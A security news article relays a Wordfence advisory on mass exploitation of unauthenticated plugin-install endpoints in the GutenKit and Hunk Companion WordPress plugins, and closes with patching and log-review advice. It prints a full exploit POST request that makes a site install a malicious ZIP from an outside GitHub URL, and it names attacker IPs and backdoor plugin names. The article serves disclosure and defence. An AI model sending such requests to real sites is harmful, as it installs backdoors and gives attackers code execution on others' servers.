Critical WordPress RCE Flaws Resurface: Over 8.7 Million Attacks Exploit GutenKit & Hunk Companion

The Wordfence Threat Intelligence team has issued a new warning about the resurgence of large-scale attacks exploiting three critical WordPress plugin vulnerabilities — CVE-2024-9234, CVE-2024-9707, and CVE-2024-11972 — in the GutenKit and Hunk Companion plugins. These flaws, each carrying a CVSS score of 9.8, allow unauthenticated attackers to install and activate arbitrary plugins, potentially leading to remote code execution (RCE).

“Our records indicate that attackers most recently started mass exploiting the issues again on October 8th, 2025, approximately one year later,” Wordfence reported. “The Wordfence Firewall has already blocked over 8,755,000 exploit attempts targeting these vulnerabilities.”

The vulnerabilities affect:

• GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor (40,000+ active installs)
• Hunk Companion (8,000+ active installs)

Both plugins contain insecure REST API endpoints that lack proper capability checks, allowing anyone with network access to install and activate arbitrary plugins — including malicious ones designed to upload files, backdoors, or execute arbitrary PHP code.

“Unfortunately, the permission check for this REST API endpoint registration is set to true. This means that this REST API endpoint is publicly accessible,” Wordfence explained. “Unauthenticated attackers can invoke the REST API endpoint and install plugins from remote sources and achieve remote code execution.”

In the case of GutenKit (CVE-2024-9234), the vulnerable endpoint /wp-json/gutenkit/v1/install-active-plugin uses the function install_and_activate_plugin_from_external() without any authentication controls. Attackers simply send a POST request to this endpoint with a link to a malicious ZIP file, such as:

POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Host: [redacted]
Content-Type: application/json
 
{"plugin":"https://github.com/xwopen/xwopen/raw/refs/heads/main/up.zip","slug":"up"}

This file, hosted on GitHub, contains heavily obfuscated PHP scripts disguised as legitimate WordPress plugins.

Wordfence analysis found that one of the malicious files, vv.php, starts with a valid PDF header but contains malicious PHP code which executes several function calls including string reversals, decompression, and payload conversion.

When decoded, it reveals a remote terminal, defacement toolkit, and network-sniffing capabilities.

The Hunk Companion plugin (CVE-2024-9707 and CVE-2024-11972) suffers from a nearly identical issue via the /wp-json/hc/v1/themehunk-import endpoint, where the permission callback is also set to __return_true. This allows unauthenticated plugin installations that can subsequently trigger remote code execution if chained with other vulnerable plugins

Wordfence has observed millions of exploit attempts targeting these endpoints, with the latest surge occurring in early October 2025. The attackers appear to be leveraging a botnet composed of compromised servers and cloud instances to automate exploitation across vulnerable WordPress sites worldwide.

Top Offending IP Addresses:

• 13.218.47.110 — over 82,900 blocked requests
• 3.10.141.23 — over 82,400 blocked requests
• 52.56.47.51 — over 81,100 blocked requests
• 18.219.237.98 — over 75,600 blocked requests
• 3.141.28.47 — over 349,900 requests (targeting Hunk Companion specifically)

Attackers are also attempting to install known vulnerable plugins such as wp-query-console, which itself has an unpatched RCE flaw, to chain exploits for persistence and privilege escalation.

“Having several backdoors is better than having one,” Wordfence warned. “Additionally, these file managers can be used to upload further malware.”

The malicious plugins dropped by these attacks often include multiple backdoors and file management utilities, enabling attackers to:

• Upload or delete files from the WordPress directory
• Change file permissions and ownership
• Exfiltrate site data
• Deploy additional web shells or payloads

Wordfence also discovered fake plugin names such as:

• background-image-cropper
• ultra-seo-processor-wp
• oke
• up

Each is a malicious ZIP containing obfuscated file uploaders and command-execution tools.

Wordfence strongly urges all WordPress administrators using these plugins to update immediately:

• GutenKit ≥ 2.1.1
• Hunk Companion ≥ 1.9.0

Administrators should also:

• Review /wp-content/plugins/ and /wp-content/upgrade/ for unknown directories
• Inspect access logs for suspicious requests to:
• /wp-json/gutenkit/v1/install-active-plugin
• /wp-json/hc/v1/themehunk-import

Block repeated requests from the malicious IPs listed in the Wordfence advisory.

Related Posts:

• Active Exploitation Observed for CVE-2024-11972 (CVSS 9.8): WordPress Plugin Flaw Exposes 10,000+ Sites to Backdoor Attacks
• WordPress Malware Alert: Fake Anti-Malware Plugin Grants Admin Access and Executes Remote Code
• Zoom Unveils Custom AI Companion: Agent-Like AI Boosts Productivity Across 16 Business Apps
• New WordPress Malware Masquerades as Legit Plugin with Data Exfiltration and RCE Capabilities
• Breaking News: Widespread WordPress Plugin Compromise in Active Supply Chain Attack